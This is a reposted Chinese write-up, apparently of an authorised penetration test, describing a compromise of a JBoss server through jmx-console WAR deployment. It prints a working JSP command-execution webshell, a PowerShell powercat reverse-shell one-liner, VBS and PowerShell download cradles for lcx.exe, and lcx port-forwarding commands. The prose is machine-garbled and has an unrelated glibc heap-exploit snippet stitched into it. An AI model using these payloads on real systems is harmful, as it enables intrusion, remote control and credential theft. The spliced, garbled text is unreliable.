一次不完美的Jboss渗入 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

一次不完美的Jboss渗入

申博_安全防护 申博 136次浏览 未收录 0个评论

一.媒介

近来做渗入测试中碰到一个jboss的站,在其中学到一些在乙方事情挺有效的技能(此次测试是进过受权测试)在次分享一下

二.信息网络

先经由过程namp举行扫描,同时举行目次扫描,发明8080/jmx-console/,发明是jboss的站,百度到jboss可以或许布置war包getshell,接见http://xxxx:8080//jmx-console/

三.破绽应用

全局搜刮jboss.system,点击进入

一次不完美的Jboss渗入
1.制造war包

把木马文件gg.jsp(我是一个直接实行敕令代码)用紧缩软件紧缩为zip,然后变动后缀为war,然后将该war上传到互联网上可以或许接见的网
站上

//gg.jsp
<%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %>

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=big5">

</head>

<body>

<%

  Runtime runtime = Runtime.getRuntime();

  Process process =null;

  String line=null;

  InputStream is =null;

  InputStreamReader isr=null;

  BufferedReader br =null;

  String ip=request.getParameter("cmd");


  try

  {

    process =runtime.exec(ip);

    is = process.getInputStream();

    isr=new InputStreamReader(is);

    br =new BufferedReader(isr);

    out.println("<pre>");

    while( (line = br.readLine()) != null )

    {

      out.println(line);

      out.flush();

    }

    out.println("</pre>");

    is.close();

    isr.close();

    br.close();

  }

  catch(IOException e )

  {

    out.println(e);

    runtime.exit(1);

  }

%>

</body>

</html>

我这里就用python 简朴建立个ftp效劳(这也是python的一个巧用)

python -m  SimpleHTTPServer 8589

一次不完美的Jboss渗入

一次不完美的Jboss渗入
2.进入jboss.system页面找到以下,填入长途的war文件地点

一次不完美的Jboss渗入

胜利布置的界面以下

一次不完美的Jboss渗入
3.接见shell地点,并实行敕令

一次不完美的Jboss渗入

四.进一步渗入

1.在取得php shell的基础上,我们须要一个真正的cmd shell,如许有利于操纵,进过nmap扫描,发明是windows,我们可以或许经由过程powershell举行shell反弹

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd

一次不完美的Jboss渗入
当地监听,胜利猎取一个cmd shell,接下来就是提权了

一次不完美的Jboss渗入

2.在cmd 中检察端口开放信息,3389和445都开放了
想到了永久之蓝打一波,先看看打没打永久之蓝的补钉,和看看体系信息,发明打了很多补钉

一次不完美的Jboss渗入

House of Strom 破绽

一个很抽象的漏洞 原理 源码截取自glibc-2.27/malloc/malloc.c:3729 该段代码的功能就是在unsorted bin中找到与malloc的chunk相匹配的chunk,如果不匹配就把该unsorted bin放回到它对应的bin中,利用点就在这段代码里面。 for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0) || __builtin_expect (chunksize_nomask (victim) > av->system_mem, 0))
malloc_printerr (“malloc(): memory corruption”);
size = chunksize (victim);

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/

if (i

可以或许经由过程以下链接检察补钉编号
查找永久之蓝补钉编号举行比对发明该目的机械并没打补钉

一次不完美的Jboss渗入

一次不完美的Jboss渗入

3.看端口扫描效果,3389过滤了,445也过滤了,只要端口转发再打了

一次不完美的Jboss渗入

4.先在shell中检察有那些义务,看看有没杀毒软件,初看没有,但厥后才发明了,竟然有卡巴斯基

一次不完美的Jboss渗入

5.没事就随处阅读目次检察内容(发明google账号密码竟然记录在txt文件中),发明任何目次都能阅读和看信息,就疑心这个用户的权限,赶忙看了哈…竟然是administrator 组的,那提权就不用了涩,但照样想3389连进去

一次不完美的Jboss渗入

6.盘算用vbs下载一个lcx或许EarthWorm举行端口转发,vbs下载代码,一样平常下载在C:\Windows\Temp\目次下,可读可写

vbs下载代码

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\Windows\Temp\2.txt",2 >>download.vbs

powershell 下载代码

powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:\Windows\Temp\2.txt')

7.当本身写进去了后,更名为exe实行的时刻,被杀了,最后又看了下义务,才发明卡巴斯基,然后就一向被卡在这里

8.lcx敕令以下

lcx 敕令

//被进击机械
lcx -slave 本身外网ip  51 内网ip 3389
//进击机械
lcx.exe  -listen 51 9090

因为防火墙限定,局部端口如3389没法经由过程防火墙,此时可以或许将该目的主机的3389端口透传到防火墙许可的其他端口,如53端口.

lcx -tran 53 目的主机ip 3389

总结

虽然临时没有胜利,但从中照样学到很多渗入学问,也邃晓了实战能进步很多手艺。缺乏就是学问不敷,还需勤奋。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明一次不完美的Jboss渗入
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址